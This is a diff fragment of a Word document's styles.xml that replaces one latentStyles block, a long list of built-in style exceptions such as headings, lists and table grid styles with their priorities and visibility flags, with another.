-    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="382">
+    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Level 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
